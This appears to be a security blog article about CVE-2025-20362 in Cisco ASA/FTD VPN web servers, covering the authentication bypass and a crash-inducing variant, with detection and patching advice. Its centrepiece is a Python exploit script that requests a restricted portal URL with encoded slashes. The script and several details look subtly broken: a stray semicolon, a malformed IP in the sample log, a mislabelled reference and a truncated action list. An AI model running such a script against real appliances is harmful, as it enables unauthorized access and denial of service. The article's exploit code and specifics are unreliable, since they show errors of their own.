CVE-2025-20362 - New Attack Variant Exposes Cisco ASA & FTD VPNs — Exploit Details and Urgent Update

Update (November 5, 2025): Cisco has identified a new attack variant targeting Cisco Secure ASA and FTD devices with vulnerable software (CVE-2025-20333 & CVE-2025-20362). Attackers can remotely crash (reload) unpatched devices, causing denial of service (DoS). Cisco urges all customers to upgrade right away. This article covers how the exploit works, shares sample payloads, references, and explains the fix.

What is CVE-2025-20362?

CVE-2025-20362 is a critical vulnerability in the VPN web server component of Cisco Secure Firewall Adaptive Security Appliance (ASA) and Cisco Secure Firewall Threat Defense (FTD). It allows attackers—without any authentication—to access otherwise restricted VPN-related URLs.

How the Attack Works

Attackers can send crafted HTTP(S) requests to the VPN web interface on a vulnerable ASA/FTD device. The web server fails to properly validate certain user inputs, letting attackers sneak into restricted areas, or worse—trigger a reload.

Example Exploit Step

Suppose your ASA or FTD appliance is accessible at https://vpn.acme-corp.com/.

An attacker can send a GET request targeting a specific VPN URL endpoint, such as /+CSCOE+/portal.html, which should normally require authentication. Using crafted request payloads like double encoding and header manipulation, the attacker bypasses standard access controls.

Simple Exploit Example (Python)

import requests

target = "https://vpn.acme-corp.com";
endpoint = "/+CSCOE+/portal.html"
headers = {
    "User-Agent": "Exploit-Scanner",
    "Cookie": "webvpnlogin=; webvpnlang=en"
}

# Bypass by double-encoding the endpoint
exploit_url = f"{target}/{endpoint.replace('/', '%2f')}"

# Send exploit
response = requests.get(exploit_url, headers=headers, verify=False)
print("HTTP Status:", response.status_code)
print("Response Preview:\n", response.text[:300])

If vulnerable, the web server may respond with the restricted content or, depending on crafted requests, cause the device to reload (crash), resulting in a DoS.

Signs of Exploitation

- Unexpected reloads/reboots without crashinfo logs

Check your ASA/FTD logs for patterns similar to

%ASA-2-105041: (Primary) Authentication failed for user from 203..113.42/63421 to xxx.xxx.xxx.xxx/443
%ASA-4-444400: Device reload due to unknown exception

Cisco Security Advisory:

CVE-2025-20362 Detail & Patch Info

Exploit Database:

CVE-2025-20362 at NVD

For the list of fixed software, see the Cisco advisory’s "#fs" section.

Restrict Web VPN Access:

Until patching is complete, limit VPN web interface exposure. Use access lists (ACLs) to restrict management plane to trusted IPs.

Monitor for Abuse:

Monitor logs and network traffic for suspicious access to /+CSCOE+/ or other known restricted endpoints.

Conclusion

CVE-2025-20362 is a severe vulnerability that can permit attackers to bypass authentication and potentially crash your Cisco ASA/FTD devices remotely. This is especially dangerous as attackers can chain techniques (as seen in new variants since Nov 2025) to take down your network perimeter or abuse VPN access.

Act now:

Restrict management interfaces

For continued updates, always monitor the Cisco Security Portal and subscribe to product advisories.

Timeline

Published on: 09/25/2025 16:15:32 UTC
Last modified on: 11/06/2025 14:51:19 UTC